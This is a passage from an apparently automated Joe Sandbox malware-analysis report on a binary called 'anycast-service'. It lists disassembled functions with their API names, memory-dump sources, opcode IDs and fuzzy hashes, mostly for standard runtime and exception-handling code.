                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$ControlDevice
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3319937403-0
                                                                                                                              • Opcode ID: 06654a4662fffa91bfcf9b5e6e5d0a66d07dc18fc64ad288d8830556be78c966
                                                                                                                              • Instruction ID: e967f90474f86e523f6fa38f2b609e94ba1c862ce814d7fdf773d70ae0588090
                                                                                                                              • Opcode Fuzzy Hash: 06654a4662fffa91bfcf9b5e6e5d0a66d07dc18fc64ad288d8830556be78c966
                                                                                                                              • Instruction Fuzzy Hash: 2E01C071A48B4187EF408B7AA05447933E0FB883D5F044432EA8E47790DF7CD89ACB14
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8018F20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                              • String ID: MOC$RCC
                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                              • Opcode ID: 273864678f75796bdf9556a5265e66a7e7c662aa29c92d563cbd31812a5aceb4
                                                                                                                              • Instruction ID: c3decec1b57359ae36c24decd8220f3494760b22ed57c1315fefd69233cd16c2
                                                                                                                              • Opcode Fuzzy Hash: 273864678f75796bdf9556a5265e66a7e7c662aa29c92d563cbd31812a5aceb4
                                                                                                                              • Instruction Fuzzy Hash: 25917C72A08781CAEB11EB69E8802AE7BA0F7047D8F14412AEB8D17795DF38D197C704
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F83DCC Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00007FF8B8F86470: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8B8F820FE), ref: 00007FF8B8F8647E
                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B8F83F4B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: abort
                                                                                                                              • String ID: $csm$csm
                                                                                                                              • API String ID: 4206212132-1512788406
                                                                                                                              • Opcode ID: d59064e970bef6e2f01495a9f5baec18c6d611ab4e46ab670ed31d5d750d271d
                                                                                                                              • Instruction ID: 74a43803f4473a3a18a16e3faeff7e41570e8079d20526be2b06e6c7525c9ac9
                                                                                                                              • Opcode Fuzzy Hash: d59064e970bef6e2f01495a9f5baec18c6d611ab4e46ab670ed31d5d750d271d
                                                                                                                              • Instruction Fuzzy Hash: F871A032908682C6DB648F29D490A797BA0EB45BC6F148136EB8D47B9ACF3CD592C744
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F83BA4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00007FF8B8F86470: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8B8F820FE), ref: 00007FF8B8F8647E
                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B8F83C9B
                                                                                                                              • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF8B8F83CAB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                                                                                              • String ID: csm$csm
                                                                                                                              • API String ID: 4108983575-3733052814
                                                                                                                              • Opcode ID: 956d3978ea0128c68435e5e46f418f1811709aeed6f56920cc5ff8293b205878
                                                                                                                              • Instruction ID: d0ac2fad87339271bb887f02a5e95a3a175d500d58981848edb17e3dde15e650
                                                                                                                              • Opcode Fuzzy Hash: 956d3978ea0128c68435e5e46f418f1811709aeed6f56920cc5ff8293b205878
                                                                                                                              • Instruction Fuzzy Hash: 21519C32908682CAEB648F199544B6977E0FB51BD6F144135DB8D87BA6CF3CE462CB08
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F82160 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00007FF8B8F86470: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8B8F820FE), ref: 00007FF8B8F8647E
                                                                                                                              • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B8F8219E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: abortterminate
                                                                                                                              • String ID: MOC$RCC$csm
                                                                                                                              • API String ID: 661698970-2671469338
                                                                                                                              • Opcode ID: dcc662c9dfb65c130248d0151130d5f484a751f802779e5e017a9940aa5ea13e
                                                                                                                              • Instruction ID: a7a034d974335e7d95f2cb7b2f4b347fc3334f2fb80a4d283962f2b68c8ce16d
                                                                                                                              • Opcode Fuzzy Hash: dcc662c9dfb65c130248d0151130d5f484a751f802779e5e017a9940aa5ea13e
                                                                                                                              • Instruction Fuzzy Hash: 04F06272918607C1E7505FA9E18556C3674FF88BC6F195031D74806357CF3CE8A2C745
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F8DCD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __C_specific_handler.LIBVCRUNTIME ref: 00007FF8B8F8DCE0
                                                                                                                                • Part of subcall function 00007FF8B8F8DF20: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FF8B8F8DFE0
                                                                                                                                • Part of subcall function 00007FF8B8F8DF20: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF8B8F8DCE5), ref: 00007FF8B8F8E02F
                                                                                                                                • Part of subcall function 00007FF8B8F86470: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8B8F820FE), ref: 00007FF8B8F8647E
                                                                                                                              • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B8F8DD0A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: C_specific_handlerCurrentImageNonwritableUnwindabortterminate
                                                                                                                              • String ID: csm$f
                                                                                                                              • API String ID: 2451123448-629598281
                                                                                                                              • Opcode ID: 89e9a056b28f5890c14b99ed9956c8b1fc11c832948cfbac1f8a2706370bba82
                                                                                                                              • Instruction ID: 7911258d265ca4090b43b59d1aa24c2b7216ad15e6bd1b171ce444773639b690
                                                                                                                              • Opcode Fuzzy Hash: 89e9a056b28f5890c14b99ed9956c8b1fc11c832948cfbac1f8a2706370bba82
                                                                                                                              • Instruction Fuzzy Hash: ADE0E572C08647C0EB607B64B58053C67A4EF44BD5F249030DB880734BCF3CD8A28619
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F897BC Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name::operator+
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2943138195-0
                                                                                                                              • Opcode ID: ed21fef6f93a83816667b0f56a4ac1e6d2525d83ba8dbc47a7b1abe2f50560bd
                                                                                                                              • Instruction ID: 32549ba13089fce8597c92fe5a6b0c9888757908547af23f27173bf5fe5b642f
                                                                                                                              • Opcode Fuzzy Hash: ed21fef6f93a83816667b0f56a4ac1e6d2525d83ba8dbc47a7b1abe2f50560bd
                                                                                                                              • Instruction Fuzzy Hash: EF913732F08652D9FB118BA8D840BBC27A0FB5478AF544036DB4E57796DF7CA846C388
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F89F70 Relevance: 6.1, APIs: 4, Instructions: 134COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name::operator+$NameName::
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 168861036-0
                                                                                                                              • Opcode ID: b11775e1f2d0a8005ce2f6571ee378364fd895b9db21ba60d463177ba707568b
                                                                                                                              • Instruction ID: 6f68c22f59fe15f2d3ea6543e3f52e4c226bf1e912dc44fce6f2a1cc1afa08c2
                                                                                                                              • Opcode Fuzzy Hash: b11775e1f2d0a8005ce2f6571ee378364fd895b9db21ba60d463177ba707568b
                                                                                                                              • Instruction Fuzzy Hash: 61511832A18A52D9EB11CB68E840BBC37A0FB95B8AF548131DB0D47796DF3DE442C749
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F8BEE4 Relevance: 6.1, APIs: 4, Instructions: 85COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name::operator+
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2943138195-0
                                                                                                                              • Opcode ID: 723ae74d117a88f54f8b3946c9f0071058428538187da791ca1ee5ba79ba4177
                                                                                                                              • Instruction ID: 88c457c2a21412348dcb36a9bd456a5bbf797a3694de391236a9b15796263db6
                                                                                                                              • Opcode Fuzzy Hash: 723ae74d117a88f54f8b3946c9f0071058428538187da791ca1ee5ba79ba4177
                                                                                                                              • Instruction Fuzzy Hash: 87413772A08B95C9EB01CFA8D4807AC37B0BB54B89F548025EB4D5775ADB3CD442C754
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF6ABE5EC78 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2139340737.00007FF6ABAC1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6ABAC0000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2138650532.00007FF6ABAC0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2141658275.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2141982517.00007FF6ABFAB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2142006117.00007FF6ABFAC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2142151392.00007FF6AC2F2000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff6abac0000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2933794660-0
                                                                                                                              • Opcode ID: ef7d41817baf07b3239804dd286151beaa03719c3909fde7315300d5354abff7
                                                                                                                              • Instruction ID: 5d299edce419c69125e4df7f9632d70d0c0c33edfd655f7cf02c6814cffb74eb
                                                                                                                              • Opcode Fuzzy Hash: ef7d41817baf07b3239804dd286151beaa03719c3909fde7315300d5354abff7
                                                                                                                              • Instruction Fuzzy Hash: BC111C36B16B018AEB00CF70E8542B833B4F75D758F440E35DA6D867A4EF78D1A48340
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8014680 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$ControlDevice
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3319937403-0
                                                                                                                              • Opcode ID: 9204fc8275d97f521131d0d3fbbd32722434b6a187e37514eae9f7ea80bae389
                                                                                                                              • Instruction ID: c39422e5dc3266b6828a60d80cbdc3e7cf4623b7228557d161d38123973d46b7
                                                                                                                              • Opcode Fuzzy Hash: 9204fc8275d97f521131d0d3fbbd32722434b6a187e37514eae9f7ea80bae389
                                                                                                                              • Instruction Fuzzy Hash: 29F0F6B2A18B8186DB149B65E4441AAB3E1FB8C794F948136E78D427A8CF7CC55ACB04
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8019494 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __except_validate_context_record
                                                                                                                              • String ID: csm$csm
                                                                                                                              • API String ID: 1467352782-3733052814
                                                                                                                              • Opcode ID: 73d1ac12611ef1335a45458e4f77d704843bb7bb9b0eb9f70e159c433604c904
                                                                                                                              • Instruction ID: 15d093aca2905a7bf4afcd6333e233a36f67313e5a7692123219c03040e6dc2a
                                                                                                                              • Opcode Fuzzy Hash: 73d1ac12611ef1335a45458e4f77d704843bb7bb9b0eb9f70e159c433604c904
                                                                                                                              • Instruction Fuzzy Hash: 61719F72A08681C6DF60AF29904077A7BA0EB05BE8F548136FB8D07AC9CB3CE553C744
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B801C014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3215553584-3916222277
                                                                                                                              • Opcode ID: 319adfab18cb2fb31f3998ff5d724a21c609fbcf90d91a74ededd9593433a755
                                                                                                                              • Instruction ID: 0d3c3cdd87b7c9c9c4c4b1d6ddd4b3bf6c366fe71a5a05836be40bf9ac592baf
                                                                                                                              • Opcode Fuzzy Hash: 319adfab18cb2fb31f3998ff5d724a21c609fbcf90d91a74ededd9593433a755
                                                                                                                              • Instruction Fuzzy Hash: F1517572998602CAEF64AE2E804537E77A1FB16BE8F541135F70A461D4CF38D483D709
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8026F28 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                              • String ID: e+000$gfff
                                                                                                                              • API String ID: 3215553584-3030954782
                                                                                                                              • Opcode ID: 1c2d53e213d870219d0386161cdf4b392d8f16b45064eee8b0c5d90026607f5a
                                                                                                                              • Instruction ID: 743b30cd85889d5a643599db1ca4424d0f3417af125401433be0db2a51495647
                                                                                                                              • Opcode Fuzzy Hash: 1c2d53e213d870219d0386161cdf4b392d8f16b45064eee8b0c5d90026607f5a
                                                                                                                              • Instruction Fuzzy Hash: DC512762B187C2C6EB618F29D84136DAA91EB40BE0F489231DB9847BD5CF7DE447C704
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80198E4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                              • String ID: csm
                                                                                                                              • API String ID: 2558813199-1018135373
                                                                                                                              • Opcode ID: 031bc2d073405218d13d30db2563821db628852c0a0357e38510c893a3d586d3
                                                                                                                              • Instruction ID: a0ddb95f8d1731c028afc585c5f43c4b7fa6a4232e598ae85aec951d3b4dfbff
                                                                                                                              • Opcode Fuzzy Hash: 031bc2d073405218d13d30db2563821db628852c0a0357e38510c893a3d586d3
                                                                                                                              • Instruction Fuzzy Hash: 4B511D76A09641C6EA60EB19E08436E77A0FB94BE5F440134EB8D07B96CF7CE457CB04
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F84490 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
